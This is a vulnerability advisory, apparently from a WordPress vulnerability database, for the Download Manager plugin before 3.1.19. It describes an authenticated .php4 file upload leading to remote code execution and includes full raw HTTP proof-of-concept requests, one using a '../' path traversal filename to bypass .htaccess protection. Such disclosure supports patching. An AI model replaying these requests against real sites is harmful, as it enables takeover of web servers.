WordPress Plugin Vulnerabilities
Download Manager < 3.1.19 - Authenticated (author+) PHP4 File Upload to RCE
Description
The wpdm_admin_upload_file AJAX action used a blacklist approach to forbid potential dangerous files, such as PHP, from being uploaded. However, other dangerous extensions, like .php4 were not forbidden.
Proof of Concept
As an author (or any account with the upload_files capability), attach a .php4 file to a download (/wp-admin/post-new.php?post_type=wpdmpro) POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------380248545020708884002749165315 Content-Length: 518 Connection: close Cookie: [author+] -----------------------------380248545020708884002749165315 Content-Disposition: form-data; name="_ajax_nonce" 922675e67c -----------------------------380248545020708884002749165315 Content-Disposition: form-data; name="action" wpdm_admin_upload_file -----------------------------380248545020708884002749165315 Content-Disposition: form-data; name="package_file"; filename="test.php4" Content-Type: text/php <?php echo 'FAILED'; ?> -----------------------------380248545020708884002749165315-- The file will be located at https://example.com/wp-content/uploads/download-manager-files/test.php4 Even though the plugin has an .htaccess to prevent access to files in /uploads/download-manager-files/, (which will only work on Apache web servers, leaving IIS and Nginx unprotected), the protection can be bypasssed via a path traversal vector to make the file go in another arbitrary folder when using the chunks handler POST /wp-admin/admin-ajax.php?chunks=1 HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------380248545020708884002749165315 Content-Length: 634 Connection: close Cookie: [author+] -----------------------------380248545020708884002749165315 Content-Disposition: form-data; name="name" ../test.php4 -----------------------------380248545020708884002749165315 Content-Disposition: form-data; name="_ajax_nonce" 922675e67c -----------------------------380248545020708884002749165315 Content-Disposition: form-data; name="action" wpdm_admin_upload_file -----------------------------380248545020708884002749165315 Content-Disposition: form-data; name="package_file"; filename="whatever" Content-Type: text/php <?php echo 'FAILED'; ?> -----------------------------380248545020708884002749165315-- The file will be at https://example.com/wp-content/uploads/test.php4 and accessible to anyone
Affects Plugins
Miscellaneous
Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-04-30 (about 3 years ago)
Added
2021-04-30 (about 3 years ago)
Last Updated
2021-04-30 (about 3 years ago)